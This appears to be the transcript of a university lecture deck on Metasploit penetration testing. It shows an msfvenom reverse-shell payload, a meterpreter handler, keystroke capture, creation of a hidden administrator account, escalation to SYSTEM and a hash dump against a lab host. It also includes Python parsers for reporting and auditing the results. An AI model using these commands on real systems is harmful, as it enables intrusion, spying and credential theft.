Metasploit Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework. Define the options and payloads required to generate and use vulnerabilities. Gaining remote access. Prof Bill Buchanan http://asecuritysite.com @billatnapier

Apr 20, 2018

Transcript
Page 1

Metasploit

Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework.
Define the options and payloads required to generate and use vulnerabilities.
Gaining remote access.

Prof Bill Buchanan
http://asecuritysite.com
@billatnapier

Page 2

Metasploit: Introduction

Author: Prof Bill Buchanan

Page 6

Vulnerability Threats

Author: Prof Bill Buchanan

Pen Testing (White Hat):
  Technical Scan for Vulnerabilities (eg NESSUS)
  Business Scan for Vulnerabilities (eg Human)

Adversarial Role:
  Social Engineering.
  Password Cracking.
  Data Theft.

Automated Testing:
  Port scanning.
  Malware detection.
  SQL Database Exploits.

Risks:
  Adverse Disclosure
  Service Availability
  Business Disruption
  Damage to or Modification to Assets
  Fraud/E-Crime
  Reputational Damage
  Legal and Regulatory Censure

Threats:
  Malware
  Hacking
  Social
  Misuse
  Physical
  Error
  Environmental

Actor:
  Internal
  External
  Trusted Partner

Page 7

Vulnerability Threats

Author: Prof Bill Buchanan

Pen Testing (White Hat):
  Technical Scan for Vulnerabilities (eg NESSUS)
  Business Scan for Vulnerabilities (eg Human)

Adversarial Role:
  Social Engineering.
  Password Cracking.
  Data Theft.

Adversarial Role (attack types):
  Denial of Service
  User Account Breach
  Password Cracking
  Physical Attack
  Database Breach
  Email Breach
  SNMP Breach
  Malware Install
  Web Compromise
  Backdoor Install
  Spyware Install
  SCADA Compromise
  VoIP Compromise
  Cloud Compromise

Risks:
  Adverse Disclosure
  Service Availability
  Business Disruption
  Damage/Modification of Assets
  Fraud/E-Crime
  Reputational Damage
  Legal and Regulatory Censure

Page 8

Vulnerability Threats: CVE-2014-0515

Author: Prof Bill Buchanan

CVE-ID: CVE-2014-0515
Description: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
Published: 2015
CVSS Severity: 9.3 (HIGH)
Source: http://www.cve.mitre.org

Page 9

Metasploit: Metasploit Framework

Author: Prof Bill Buchanan

Page 10

Running msfconsole: Metasploit

Author: Prof Bill Buchanan

Metasploit / Vulnerability (CVE)

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...
[Metasploit ASCII-art banner]

Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]
+ -- --=[ 1388 exploits - 866 auxiliary - 236 post ]
+ -- --=[ 342 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

[Diagram: Exploit generator (Vulnerability Analysis -> Generate exploit) -> Host under test]

Page 11

Running msfconsole: Metasploit

Author: Prof Bill Buchanan

msf > search CVE-2014-0515

Matching Modules
================

   Name                                                  Disclosure Date  Rank    Description
   ----                                                  ---------------  ----    -----------
   exploit/windows/browser/adobe_flash_pixel_bender_bof  2014-04-28       normal  Adobe Flash Player Shader Buffer Overflow

msf > info exploit/windows/browser/adobe_flash_pixel_bender_bof

       Name: Adobe Flash Player Shader Buffer Overflow
     Module: exploit/windows/browser/adobe_flash_pixel_bender_bof
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-04-28

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Retries  false            no        Allow the browser to retry the module
  SRVHOST  0.0.0.0          yes       The local host to listen on.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 2000

Description:
  This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8.

References:
  http://cvedetails.com/cve/2014-0515/

Page 12

Running msfconsole: Metasploit

Author: Prof Bill Buchanan

root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=4444 -f exe > winexp.exe

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.200.0.208
LHOST => 10.200.0.208
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 10.200.0.208:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.200.0.205
[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500

[Diagram: WINEXP.EXE on the host under test calling back to the handler]
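The handler messages above are the evidence a tester keeps for the report: which host called back, on which port, and when. As an added example (not from the slides), this Python parser turns such a transcript into session records; the sample transcript is constructed to match the message format shown on the slide, and the "closed" message format is assumed to be the one msfconsole prints when a session ends.

```python
"""Turn an msfconsole handler transcript into a table of sessions for reporting."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# "Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500"
SESSION_OPENED = re.compile(
    r"Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\) "
    r"at (?P<when>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})"
)
# "10.200.0.205 - Meterpreter session 1 closed.  Reason: User exit" (assumed format)
SESSION_CLOSED = re.compile(r"Meterpreter session (?P<sid>\d+) closed\.\s+Reason: (?P<reason>.+)")


@dataclass
class Session:
    sid: int
    lhost: str
    lport: int
    rhost: str
    rport: int
    opened_at: str
    closed_reason: Optional[str] = None  # None while the session is still open


def parse_handler_log(text: str) -> Dict[int, Session]:
    """One Session per session id; the close reason is filled in when a closed message follows."""
    sessions: Dict[int, Session] = {}
    for line in text.splitlines():
        m = SESSION_OPENED.search(line)
        if m:
            sid = int(m["sid"])
            sessions[sid] = Session(sid, m["lhost"], int(m["lport"]),
                                    m["rhost"], int(m["rport"]), m["when"])
            continue
        m = SESSION_CLOSED.search(line)
        if m and int(m["sid"]) in sessions:
            sessions[int(m["sid"])].closed_reason = m["reason"].strip()
    return sessions


def compromised_hosts(sessions: Dict[int, Session]) -> List[str]:
    """Distinct target addresses that called back, for the report's scope table."""
    return sorted({s.rhost for s in sessions.values()})


# Constructed sample transcript in the format the slide shows.
SAMPLE_LOG = """\
[*] Started reverse handler on 10.200.0.208:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.200.0.205
[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500
[*] 10.200.0.205 - Meterpreter session 1 closed.  Reason: User exit
"""
```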

Page 13

Gaining Admin access: Metasploit

Author: Prof Bill Buchanan

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
hel <Ctrl> <LCtrl>
meterpreter > keyscan_stop

meterpreter > execute -f calc.exe
Process 3780 created.

meterpreter > screenshot
Screenshot saved to: /root/zJVqTTaq.jpeg

meterpreter > getuid
Server username: Encase-PC1\Encase

meterpreter > sysinfo
Computer        : ENCASE-PC1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Meterpreter     : x86/win32

meterpreter > getsid
Server SID: S-1-5-21-3026846657-1272420173-2154099446-1000

meterpreter > ifconfig
Interface 13
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:ab:68:00
MTU          : 1500
IPv4 Address : 10.200.0.205
IPv4 Netmask : 255.255.255.0

Page 14

Remote Desktop: Metasploit

Author: Prof Bill Buchanan

meterpreter > run getgui -u newuser -p pass
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Setting user account for logon
[*] Adding User: hacker with Password: s3cr3t
[*] Hiding user from Windows Login screen
[*] Adding User: hacker to local group 'Remote Desktop Users'
[*] Adding User: hacker to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc

0.200.0.205 - Meterpreter session 3 closed. Reason: User exit
msf exploit(handler) > exit

root@kali:~# rdesktop -u newuser -p pass 10.200.0.205
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Page 15

Gaining Admin access: Metasploit

Author: Prof Bill Buchanan

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > getuid
Server username: Encase-PC1\Encase

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch    Session     User                          Path
 ---   ----  ----              ----    -------     ----                          ----
 0     0     [System Process]          4294967295
 4     0     System            x86_64  0
 264   4     smss.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 364   524   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 372   364   csrss.exe         x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 388   524   spoolsv.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 420   364   wininit.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 524   420   services.exe      x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 532   420   lsass.exe         x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 540   420   lsm.exe           x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 632   524   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 708   524   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 788   524   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 832   524   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 856   524   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe

meterpreter > migrate 832
[*] Migrating from 2436 to 832...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
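The hashdump lines above follow the pwdump format user:RID:LM-hash:NTLM-hash:::, and two constant values in them are findings on their own, before any cracking: an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored (the good case), and an NTLM field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of the empty string, i.e. the account has a blank password. As an added example (not the deck's own code), this Python audit parses such output and reports both conditions; the sample dump inside it is constructed, and its non-empty hash values are made-up hex, not real password hashes.

```python
"""Audit hashdump (pwdump-format) output for blank passwords and stored LM hashes."""
from dataclasses import dataclass
from typing import List

# Well-known constants: LM hash of the empty string (no LM hash stored) and
# NT hash of the empty string (the account's password is blank).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"


@dataclass
class HashRecord:
    user: str
    rid: int
    lm: str
    ntlm: str


def parse_pwdump(text: str) -> List[HashRecord]:
    """Parse user:RID:LM:NTLM::: lines into records, one per non-empty line."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        records.append(HashRecord(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return records


def audit(records: List[HashRecord]) -> List[str]:
    """One finding per weak condition, in input order; an empty list means nothing to report."""
    findings = []
    for r in records:
        if r.ntlm == EMPTY_NTLM:
            findings.append(f"{r.user} (RID {r.rid}): blank password")
        if r.lm != EMPTY_LM:
            findings.append(f"{r.user} (RID {r.rid}): LM hash stored (legacy format, easily cracked)")
    return findings


# Constructed sample in the format hashdump prints; alice's and bob's hash
# values are made-up hex strings, not hashes of any real password.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:1002:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
```

Run against the slide's own three lines, the same check reports the Administrator and Guest accounts as having blank passwords and nothing for Encase.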

Page 16

Metasploit

Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework.
Define the options and payloads required to generate and use vulnerabilities.
Understand how to test a range of devices/instances.
Using shells and callbacks.

Prof Bill Buchanan
http://asecuritysite.com
@billatnapier